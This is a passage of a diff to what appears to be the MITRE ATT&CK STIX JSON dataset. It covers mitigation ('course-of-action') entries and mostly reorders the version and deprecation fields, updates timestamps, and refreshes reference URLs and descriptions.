"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -177651,8 +205487,8 @@
"type": "course-of-action",
"modified": "2019-07-24T14:34:11.298Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"object_marking_refs": [
@@ -177697,8 +205533,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.017Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"object_marking_refs": [
@@ -177743,8 +205579,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.670Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--cb825b86-3f3b-4686-ba99-44878f5d3173",
@@ -177779,8 +205615,8 @@
"type": "course-of-action",
"modified": "2019-07-24T14:08:16.317Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--ace4daee-f914-4707-be75-843f16da2edf",
@@ -177800,10 +205636,13 @@
"type": "course-of-action",
"modified": "2019-07-24T14:37:14.608Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
+ "created": "2019-06-11T16:43:05.712Z",
+ "modified": "2019-06-11T16:43:05.712Z",
+ "type": "course-of-action",
"id": "course-of-action--90f39ee1-d5a3-4aaa-9f28-3b42815b0d46",
"description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
"name": "Behavior Prevention on Endpoint",
@@ -177818,9 +205657,6 @@
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "type": "course-of-action",
- "modified": "2019-06-11T16:43:05.712Z",
- "created": "2019-06-11T16:43:05.712Z",
"x_mitre_version": "1.0"
},
{
@@ -177866,8 +205702,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.322Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -177885,7 +205721,7 @@
"description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.",
"id": "course-of-action--7da0387c-ba92-4553-b291-b636ee42b2eb",
"type": "course-of-action",
- "modified": "2019-06-11T17:02:36.984Z",
+ "modified": "2020-05-19T12:28:50.603Z",
"created": "2019-06-11T17:02:36.984Z",
"x_mitre_version": "1.0"
},
@@ -177906,8 +205742,8 @@
"source_name": "TCG Trusted Platform Module"
},
{
- "url": "https://technet.microsoft.com/en-us/windows/dn168167.aspx",
- "description": "Microsoft. (n.d.). Secure the Windows 8.1 boot process. Retrieved June 11, 2016.",
+ "url": "https://docs.microsoft.com/en-us/windows/security/information-protection/secure-the-windows-10-boot-process",
+ "description": "Microsoft. (n.d.). Secure the Windows 10 boot process. Retrieved April 23, 2020.",
"source_name": "TechNet Secure Boot Process"
}
],
@@ -177915,10 +205751,10 @@
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"type": "course-of-action",
- "modified": "2019-07-24T14:10:43.001Z",
+ "modified": "2020-04-23T19:10:28.284Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--1c0b39f9-a0c5-42b2-abd8-dc8f1eb74e67",
@@ -177963,8 +205799,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.672Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"object_marking_refs": [
@@ -177989,8 +205825,8 @@
"type": "course-of-action",
"modified": "2019-07-24T14:41:17.903Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--4a99fecc-680b-448e-8fe7-8144c60d272c",
@@ -178015,8 +205851,8 @@
"type": "course-of-action",
"modified": "2019-07-24T18:03:10.785Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.1"
},
{
"id": "course-of-action--beb45abb-11e8-4aef-9778-1f9ac249784f",
@@ -178041,8 +205877,8 @@
"type": "course-of-action",
"modified": "2019-07-24T14:13:23.637Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--91816292-3686-4a6e-83c4-4c08513b9b57",
@@ -178067,8 +205903,8 @@
"type": "course-of-action",
"modified": "2019-07-24T18:04:13.126Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--d7c49196-b40e-42bc-8eed-b803113692ed",
@@ -178118,8 +205954,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.675Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--3e7018e9-7389-48e7-9208-0bdbcbba9483",
@@ -178144,8 +205980,8 @@
"type": "course-of-action",
"modified": "2019-07-24T18:05:00.492Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--19edfa02-1a5f-47e4-ad82-3288f57f64cf",
@@ -178190,13 +206026,17 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.314Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
- "id": "course-of-action--590777b3-b475-4c7c-aaf8-f4a73b140312",
- "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.",
- "name": "Code Signing",
+ "created": "2019-06-11T17:01:25.405Z",
+ "modified": "2020-05-20T13:12:02.881Z",
+ "type": "course-of-action",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -178204,14 +206044,10 @@
"url": "https://attack.mitre.org/mitigations/M1045"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "type": "course-of-action",
- "modified": "2019-06-11T17:01:25.405Z",
- "created": "2019-06-11T17:01:25.405Z",
- "x_mitre_version": "1.0"
+ "name": "Code Signing",
+ "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.",
+ "id": "course-of-action--590777b3-b475-4c7c-aaf8-f4a73b140312",
+ "x_mitre_version": "1.1"
},
{
"object_marking_refs": [
@@ -178246,8 +206082,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.319Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_deprecated": true,
- "x_mitre_version": "1.0"
+ "x_mitre_version": "1.0",
+ "x_mitre_deprecated": true
},
{
"object_marking_refs": [
@@ -178272,8 +206108,8 @@
"type": "course-of-action",
"modified": "2019-07-24T14:17:58.966Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--b8d57b16-d8e2-428c-a645-1083795b3445",
@@ -178303,8 +206139,8 @@
"type": "course-of-action",
"modified": "2019-07-24T18:09:33.072Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -178349,8 +206185,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:24.252Z",
"created": "2019-04-25T20:53:07.814Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--08e02f67-ea09-4f77-a70b-414963c29fc2",
@@ -178375,8 +206211,8 @@
"type": "course-of-action",
"modified": "2019-07-24T14:19:23.148Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--676975b9-7e8e-463d-a31e-4ed2ecbfed81",
@@ -178396,8 +206232,8 @@
"type": "course-of-action",
"modified": "2019-07-24T18:10:06.475Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--ff5d862a-ae6b-4833-8c15-e235d654d28e",
@@ -178442,8 +206278,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.056Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--3a41b366-cfd6-4af2-a6e7-3c6e3c4ebcef",
@@ -178483,8 +206319,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.678Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--9a5b7194-88e0-4579-b82f-e3c27b8cca80",
@@ -178504,8 +206340,8 @@
"type": "course-of-action",
"modified": "2019-07-24T18:11:24.572Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -178605,10 +206441,13 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.442Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
+ "created": "2018-10-17T00:14:20.652Z",
+ "modified": "2019-07-24T18:12:19.081Z",
+ "type": "course-of-action",
"id": "course-of-action--0472af99-f25c-4abe-9fce-010fa3450e72",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Credentials in Files Mitigation",
@@ -178628,11 +206467,8 @@
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "type": "course-of-action",
- "modified": "2019-07-24T18:12:19.081Z",
- "created": "2018-10-17T00:14:20.652Z",
- "x_mitre_deprecated": true,
- "x_mitre_version": "1.0"
+ "x_mitre_version": "1.0",
+ "x_mitre_deprecated": true
},
{
"id": "course-of-action--4490fee2-5c70-4db3-8db5-8d88767dbd55",
@@ -178652,8 +206488,8 @@
"type": "course-of-action",
"modified": "2019-07-24T14:22:57.902Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--f3d0c735-330f-43c2-8e8e-51bcfa51e8c3",
@@ -178678,8 +206514,8 @@
"type": "course-of-action",
"modified": "2019-07-24T18:13:22.017Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--a569295c-a093-4db4-9fb4-7105edef85ad",
@@ -178704,8 +206540,8 @@
"type": "course-of-action",
"modified": "2019-07-24T18:14:14.227Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--b70627f7-3b43-4c6f-8fc0-c918c41f8f72",
@@ -178725,8 +206561,8 @@
"type": "course-of-action",
"modified": "2019-07-24T14:23:59.683Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--96913243-2b5e-4483-a65c-bb152ddd2f04",
@@ -178776,8 +206612,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.083Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--7a14d974-f3d9-4e4e-9b7d-980385762908",
@@ -178797,8 +206633,8 @@
"type": "course-of-action",
"modified": "2019-07-24T14:24:44.818Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -178863,8 +206699,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.683Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -178914,8 +206750,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.871Z",
"created": "2019-03-14T20:17:16.234Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--fcbe8424-eb3e-4794-b76d-e743f5a49b8b",
@@ -178940,8 +206776,8 @@
"type": "course-of-action",
"modified": "2019-07-24T18:25:06.552Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--2a8de25c-f743-4348-b101-3ee33ab5871b",
@@ -178986,8 +206822,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.440Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -179037,8 +206873,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.888Z",
"created": "2019-03-15T14:49:53.983Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--d0fcf37a-b6c4-4745-9c43-4fcdb8bfc88e",
@@ -179063,8 +206899,8 @@
"type": "course-of-action",
"modified": "2019-07-24T14:28:48.363Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--4320b080-9ae9-4541-9b8b-bcd0961dbbbd",
@@ -179084,8 +206920,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:05:13.374Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--ba06d68a-4891-4eb5-b634-152e05ec60ee",
@@ -179110,8 +206946,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:05:56.488Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--13cad982-35e3-4340-9095-7124b653df4b",
@@ -179131,8 +206967,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:06:19.932Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--7ee0879d-ce4f-4f54-a96b-c532dfb98ffd",
@@ -179177,8 +207013,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.537Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--d9727aee-48b8-4fdb-89e2-4c49746ba4dd",
@@ -179223,8 +207059,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.087Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--39706d54-0d06-4a25-816a-78cc43455100",
@@ -179269,8 +207105,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.688Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -179285,18 +207121,18 @@
},
{
"description": "OWASP. (2017, April 16). OWASP Top 10 2017 - The Ten Most Critical Web Application Security Risks. Retrieved February 12, 2019.",
- "url": "https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf",
+ "url": "https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/",
"source_name": "OWASP Top 10 2017"
}
],
"description": "Implementing best practices for websites such as defending against [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190) (Citation: OWASP Top 10 2017). Consider implementing IT disaster recovery plans that contain procedures for taking regular data backups that can be used to restore organizational data. (Ready.gov IT DRP) Ensure backups are stored off system and is protected from common methods adversaries may use to gain access and destroy the backups to prevent recovery.",
- "name": "Defacement Mitigation ",
+ "name": "Defacement Mitigation",
"id": "course-of-action--5d8507c4-603e-4fe1-8a4a-b8241f58734b",
"type": "course-of-action",
- "modified": "2019-07-24T19:09:19.281Z",
+ "modified": "2020-07-14T22:23:56.026Z",
"created": "2019-04-08T17:51:41.510Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--d01f473f-3cdc-4867-9e55-1de9cf1986f0",
@@ -179341,8 +207177,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.686Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -179382,8 +207218,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:10:48.260Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--910482b1-6749-4934-abcb-3e34d58294fc",
@@ -179428,8 +207264,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:12:02.818Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -179479,8 +207315,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:12:36.946Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -179520,8 +207356,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:13:31.378Z",
"created": "2019-02-18T17:22:57.941Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -179546,8 +207382,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:14:03.948Z",
"created": "2019-02-15T13:04:25.150Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--7a4d0054-53cd-476f-88af-955dddc80ee0",
@@ -179587,8 +207423,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:14:33.952Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--dc43c2fe-355e-4a79-9570-3267b0992784",
@@ -179608,8 +207444,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:15:00.897Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--80c91478-ac87-434f-bee7-11f37aec4d74",
@@ -179664,8 +207500,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:15:27.335Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--383caaa3-c46a-4f61-b2e3-653eb132f0e7",
@@ -179710,8 +207546,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.572Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -179756,8 +207592,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:16:50.511Z",
"created": "2019-04-22T22:03:26.087Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -179797,8 +207633,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:17:09.258Z",
"created": "2019-02-01T14:35:39.565Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -179813,10 +207649,10 @@
}
],
"name": "Execution Prevention",
- "description": "Block execution of code on a system through application whitelisting, blacklisting, and/or script blocking.",
+ "description": "Block execution of code on a system through application control, and/or script blocking.",
"id": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"type": "course-of-action",
- "modified": "2020-03-31T13:12:49.325Z",
+ "modified": "2020-06-20T20:11:42.195Z",
"created": "2019-06-11T16:35:25.488Z",
"x_mitre_version": "1.1"
},
@@ -179838,8 +207674,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:18:25.859Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--92c28497-2820-445e-9f3e-a03dd77dc0c8",
@@ -179864,8 +207700,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:19:30.892Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--a98be93b-a75b-4dd4-8a72-4dfd0b5e25bb",
@@ -179895,8 +207731,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:20:18.344Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--e547ed6a-f1ca-40df-8613-2ce27927f145",
@@ -179926,8 +207762,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:20:50.299Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -179945,7 +207781,7 @@
"description": "Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.",
"id": "course-of-action--d2a24649-9694-4c97-9c62-ce7b270bf6a3",
"type": "course-of-action",
- "modified": "2020-03-31T13:13:12.698Z",
+ "modified": "2020-06-20T20:22:55.938Z",
"created": "2019-06-11T17:10:57.070Z",
"x_mitre_version": "1.1"
},
@@ -179967,8 +207803,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:21:22.911Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--f2dcee22-c275-405e-87fd-48630a19dfba",
@@ -180008,8 +207844,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:22:39.193Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--06160d81-62be-46e5-aa37-4b9c645ffa31",
@@ -180044,8 +207880,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:23:33.259Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--37a3f3f5-76e6-43fe-b935-f1f494c95725",
@@ -180080,8 +207916,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:25:39.532Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--92e6d080-ca3f-4f95-bc45-172a32c4e502",
@@ -180116,8 +207952,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:26:18.998Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--14b63e6b-7531-4476-9e60-02cc5db48b62",
@@ -180152,8 +207988,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:26:53.547Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--d4fd04e0-d1a4-4b5a-a5bb-16683cdbcce2",
@@ -180173,8 +208009,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:27:15.659Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--cba5667e-e3c6-44a4-811c-266dbc00e440",
@@ -180219,8 +208055,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.544Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--515f6584-fa98-44fe-a4e8-e428c7188514",
@@ -180245,8 +208081,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:28:35.941Z",
